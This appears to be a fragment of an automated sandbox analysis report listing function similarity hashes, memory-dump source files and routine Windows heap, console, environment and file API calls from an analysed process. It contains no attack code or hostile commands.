• String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
• API String ID: 287713880-1183017076
• Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
• Instruction ID: a6f7f1a48d9c4e2b2ac0407d9743ec9d055e20fd48c7c22173785eecfe9145b5
• Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
• Instruction Fuzzy Hash: 6DF04421A18A5E81FA609F51A408179EDB0FF44F42BE69131D95F43254EF2CD440C620
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: KERNEL32.DLL$SetThreadUILanguage
• API String ID: 1646373207-2530943252
• Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
• Instruction ID: 76f9ef54ebf645bb6b86c2cfe5828b0b914fd861855f7ba2a7a045da788b0d3e
• Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
• Instruction Fuzzy Hash: 2601D661E09A4B92EA44AF11E895134AAB0FF45F72FE40735C93E027E0EF3CA581C320
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: RaiseFailFastException$kernelbase.dll
• API String ID: 1646373207-919018592
• Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
• Instruction ID: 5c7021d7326f1ad524cfa4acb9b6984ca50cccdd27f6790d00e794f8b70f7166
• Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
• Instruction Fuzzy Hash: 86F03A25A18B8992EA00AF12F844479EE70FF89FD2B989134DA4E03B18EF3CD485C710
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: memset$CurrentDirectorytowupper
• String ID:
• API String ID: 1403193329-0
• Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
• Instruction ID: 7bf29877bd7e2c554bd932d91fb89544e47ac15b1852428020ed26539943cab5
• Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
• Instruction Fuzzy Hash: 7561AF32B08B868AFB20EF6198442ADBBB4FB84B59FA44234DE5D17799DF38D450C710
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: _wcsnicmp$wcschr
• String ID:
• API String ID: 3270668897-0
• Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
• Instruction ID: e8bfbebfb92f461281fdaf94d9139b8a6064c94f51c4f2865decc7d0d2343290
• Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
• Instruction Fuzzy Hash: 0C516C11E0864A85EAA1BF1294181B9EBB1FF45F92FE88131DA5E072D5EF2CE941C370
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: memset$DriveFullNamePathType
• String ID:
• API String ID: 3442494845-0
• Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
• Instruction ID: e39e1f004797a3ae4ded9225d0bcdeb5ae6d261b7b8e02ca63cf6246854304c5
• Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
• Instruction Fuzzy Hash: 70318C32605BC98AEB60EF21E8446E9BBA4FB88F85F944135EA4D47B54DF38D605C710
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
• String ID:
• API String ID: 140117192-0
• Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
• Instruction ID: c5502e4c648d9f5adb7f55ab893a44caa85ac2db7cb04120ddf4ce37ca39f9e1
• Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
• Instruction Fuzzy Hash: 5241D935608B8A81EA50AF18F854365BB74FBC8B46FE00135DA8D43B64EF3DE448C760
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: wcstol$lstrcmp
• String ID:
• API String ID: 3515581199-0
• Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
• Instruction ID: e6ce32d2a6c6cc1f335b977f160e321dacab0abba2d2f0df31ee6831abd6ba0a
• Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
• Instruction Fuzzy Hash: DB219332A0964683E6616F69A098139EEB0FB49F87FA55138DB4F02654CE6CE445C710
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: File_get_osfhandle$TimeWrite
• String ID:
• API String ID: 4019809305-0
• Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
• Instruction ID: 15b16150d3b2ae61d87d383f53728dd3e98c673f8a3aa8e159256a7fc46db8f4
• Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
• Instruction Fuzzy Hash: 7631A425A0878A46FB906F54944433CEAB5FF4AF62FA46234D90D437D5CF3CD844C610
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: memset$DriveNamePathTypeVolume
• String ID:
• API String ID: 1029679093-0
• Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
• Instruction ID: 079ddb8b0c59b8d8216150af0e65df43b58fb1edd6b9bbf7962ff6e7bc843786
• Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
• Instruction Fuzzy Hash: 3D313A32705B898AEB209F21D8543E8BBA4FB89F89F944535CA4D4BB48EF3CD645C750
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: File$DeleteErrorLastWrite_get_osfhandle
• String ID:
• API String ID: 2448200120-0
• Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
• Instruction ID: 328f91f3691c33916e6030306fde911dad9d5aa16812817ecab035c0dec8b101
• Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
• Instruction Fuzzy Hash: 67212935A08B4A87E654AF21A80027DFAB5FB85F92FA44135E94E47B95DF3CE441CB20
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
• Instruction ID: 10312fcc1b0664fdfe49dc12609acceca57b18694c6b7308d73551ef44577fbd
• Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
• Instruction Fuzzy Hash: 992165A5708B45C6EA04AF52A9544B9FBB1FF89FD2BA49230DA1E03795DF3CE401C720
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 00007FF789BD3C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF789BD3D0C
  • Part of subcall function 00007FF789BD3C24: towupper.MSVCRT ref: 00007FF789BD3D2F
  • Part of subcall function 00007FF789BD3C24: iswalpha.MSVCRT ref: 00007FF789BD3D4F
  • Part of subcall function 00007FF789BD3C24: towupper.MSVCRT ref: 00007FF789BD3D75
  • Part of subcall function 00007FF789BD3C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BD3DBF
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925,?,?,?,?,00007FF789BCB9B1), ref: 00007FF789BC6ABF
• RtlFreeHeap.NTDLL(?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925,?,?,?,?,00007FF789BCB9B1), ref: 00007FF789BC6AD3
  • Part of subcall function 00007FF789BC6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF789BC6AE8,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B8B
  • Part of subcall function 00007FF789BC6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF789BC6AE8,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B97
  • Part of subcall function 00007FF789BC6B84: RtlFreeHeap.NTDLL(?,?,?,?,00007FF789BC6AE8,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6BAF
  • Part of subcall function 00007FF789BC6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC6AF1,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B39
  • Part of subcall function 00007FF789BC6B30: RtlFreeHeap.NTDLL(?,?,?,00007FF789BC6AF1,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B4D
  • Part of subcall function 00007FF789BC6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC6AF1,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B59
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925,?,?,?,?,00007FF789BCB9B1), ref: 00007FF789BC6B03
• RtlFreeHeap.NTDLL(?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925,?,?,?,?,00007FF789BCB9B1), ref: 00007FF789BC6B17
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3512109576-0
                                                                                                                    • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                    • Instruction ID: 499a986b80efaba2e0d50c16a232d259b7eb684a3b4a5ba82981e76a65746eb0
                                                                                                                    • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                    • Instruction Fuzzy Hash: 5C214F61A09A8AC6EB04AF65D4547B8BFB0FF59F4AFA44035DA0E07351EE2CA446C370
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCAF82), ref: 00007FF789BCB6D0
                                                                                                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCAF82), ref: 00007FF789BCB6E7
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCAF82), ref: 00007FF789BCB701
                                                                                                                    • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCAF82), ref: 00007FF789BCB715
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$AllocSize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2549470565-0
                                                                                                                    • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                    • Instruction ID: c03c291cd66ed064ba149653c82924396b453e771240d14087ab0a3abbe3ee35
                                                                                                                    • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                    • Instruction Fuzzy Hash: B5213321A0969AC6EA54AF55E44007CFEB1FF88F96BE89431DA0E03790EF3CE545C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF789BD507A), ref: 00007FF789BED01C
                                                                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF789BD507A), ref: 00007FF789BED033
                                                                                                                    • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF789BD507A), ref: 00007FF789BED06D
                                                                                                                    • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF789BD507A), ref: 00007FF789BED07F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1033415088-0
                                                                                                                    • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                                    • Instruction ID: 156e8f959997575f16762ade3321730fbf212a8ad50b422e42a96387fd5bea48
                                                                                                                    • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                                    • Instruction Fuzzy Hash: 67116031618A8686DA449F20F05417AFBB0FBCAF96F945135EA8E47B54EF3CD045CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 22757656-0
                                                                                                                    • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                    • Instruction ID: 8a90d41b50c92e4d06614146a6bfc27181c422ceb85b6e7c9014d4731287b3ff
                                                                                                                    • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                    • Instruction Fuzzy Hash: A1112E71A1864987E7506F24E44837DBAB0FB89FA5FA44734D62A473D0DF3D9449CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF789BE5433,?,?,?,00007FF789BE69B8,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE56C5
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,00000028,00007FF789BE5433,?,?,?,00007FF789BE69B8,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE56D9
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF789BE5433,?,?,?,00007FF789BE69B8,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE56FD
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,00000028,00007FF789BE5433,?,?,?,00007FF789BE69B8,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE5711
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$FreeProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3859560861-0
                                                                                                                    • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                    • Instruction ID: d047d02ab10545f19e0d7d112ef87390b93682f133160d4cbe0b4f02ebfff3d0
                                                                                                                    • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                    • Instruction Fuzzy Hash: CA11EC72A04B95CADB009F56E4440ADBBB0F75DF85B998135DB4E03B18EF38E456C750
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 140117192-0
                                                                                                                    • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                    • Instruction ID: 7b9259c356e8247d4c7102b9d03b27bcd97afddc51a0e22de4df0bf58df5cce9
                                                                                                                    • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                    • Instruction Fuzzy Hash: E621E735909B8981EB40AF44F884369BBB4FB84F56FA00135DA8D43B64EF7DE448C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BD4AD6
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BD4AEF
                                                                                                                      • Part of subcall function 00007FF789BD4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A28
